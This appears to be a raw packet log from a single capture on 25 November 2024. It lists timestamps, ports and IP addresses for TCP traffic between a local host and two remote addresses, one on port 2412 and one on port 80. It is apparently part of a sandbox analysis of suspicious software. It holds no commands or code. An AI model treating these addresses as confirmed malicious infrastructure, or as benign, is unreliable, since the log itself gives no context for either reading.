                                                                                                                                                                                Nov 25, 2024 14:07:29.696348906 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.697304010 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.697385073 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.697429895 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.698556900 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.698657036 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.698707104 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.699444056 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.699680090 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.699723959 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.700512886 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.700686932 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.700736046 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.701613903 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.701754093 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.701801062 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.702699900 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.702799082 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.702843904 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.703994036 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.704174995 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.704221010 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.705358982 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.705455065 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.705501080 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.706289053 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.706429958 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.706487894 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:29.707073927 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.707174063 CET24124917531.13.224.72192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:29.707226992 CET491752412192.168.2.2231.13.224.72
                                                                                                                                                                                Nov 25, 2024 14:07:34.084208012 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:34.204480886 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:34.204593897 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:34.204668045 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:34.324503899 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.375935078 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376003027 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376061916 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.376089096 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376126051 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376162052 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376167059 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.376226902 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376271009 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.376279116 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376316071 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376349926 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376358032 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.376386881 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.376450062 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.385066986 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.497065067 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.497109890 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.497173071 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.577543020 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.577685118 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.577769041 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.581182957 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.581327915 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.581386089 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.589680910 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.589801073 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.589849949 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.598297119 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.598438025 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.598491907 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.606472015 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.606615067 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.606664896 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.615066051 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.615158081 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.615210056 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.623342991 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.623529911 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.623573065 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.631794930 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.631958008 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.632010937 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.640651941 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.640768051 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.640818119 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.649816036 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.649966955 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.650017023 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.658927917 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.658942938 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.658993959 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.778332949 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.778388977 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.778455973 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.779850960 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.779962063 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.780025005 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.785126925 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.785254955 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.785315037 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.790879965 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.790911913 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.790961981 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.796147108 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.796235085 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.796294928 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.801466942 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.801577091 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.801644087 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.806679010 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.806735039 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.806807041 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.811573982 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.811681032 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.811729908 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.816802025 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.816848993 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.816900015 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.822293997 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.822448015 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.822499990 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.827263117 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.827328920 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.827378988 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.832417965 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.832546949 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.832596064 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.837737083 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.837759972 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.837811947 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.842962980 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.843089104 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.843143940 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.848200083 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.848229885 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.848278046 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.853377104 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.853569031 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.853621006 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.979990005 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.980191946 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.980247974 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.982194901 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.982330084 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.982392073 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.986639977 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.986709118 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.986757994 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.991255999 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.991410971 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.991456985 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.994911909 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.994962931 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.995014906 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:35.998935938 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.999105930 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:35.999154091 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.003241062 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.003393888 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.003441095 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.007457018 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.007555962 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.007596016 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.012769938 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.012835026 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.012892008 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.016870975 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.016963005 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.017008066 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.020895004 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.021025896 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.021069050 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.024589062 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.024689913 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.024735928 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.028899908 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.029067039 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.029119968 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.033180952 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.033271074 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.033313036 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.037468910 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.037585974 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.037632942 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.041960001 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.042087078 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.042136908 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.046201944 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.046295881 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.046339035 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.050379992 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.050582886 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.050627947 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.055347919 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.055670977 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.055712938 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.059436083 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.059509039 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.059556007 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.063324928 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.063465118 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.063509941 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.067569017 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.067667007 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.067717075 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.070852041 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.071830034 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.071918011 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.071963072 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.076314926 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.076364994 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.076409101 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.080415010 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.080496073 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.080557108 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.180692911 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.180886030 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.180943012 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.182820082 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.182919025 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.182969093 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.186595917 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.186681032 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.186722994 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.190376997 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.190475941 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.190542936 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.194045067 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.194184065 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.194231987 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.198558092 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.198709011 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.198767900 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.201298952 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.201430082 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.201472998 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.204705954 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.204813957 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.204866886 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.208323956 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.208508968 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.208563089 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.211581945 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.211669922 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.211719036 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.215208054 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.215234041 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.215287924 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.218384027 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.218450069 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.218498945 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.221755028 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.221874952 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.221916914 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.225203991 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.225301981 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.225348949 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.228768110 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.228889942 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.228944063 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.232007980 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.232131958 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.232193947 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.235465050 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.235591888 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.235647917 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.238960981 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.239114046 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.239167929 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.242307901 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.242424011 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.242474079 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.245698929 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.245840073 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.245887041 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.249159098 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.249257088 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.249305964 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.252561092 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.252612114 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.252657890 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.256019115 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.256091118 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.256136894 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.259495020 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.259622097 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.259670019 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.357290030 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.357319117 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.357384920 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.358707905 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.358786106 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.358835936 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.362173080 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.362246037 CET8049177172.234.205.135192.168.2.22
                                                                                                                                                                                Nov 25, 2024 14:07:36.362315893 CET4917780192.168.2.22172.234.205.135
                                                                                                                                                                                Nov 25, 2024 14:07:36.365545988 CET8049177172.234.205.135192.168.2.22
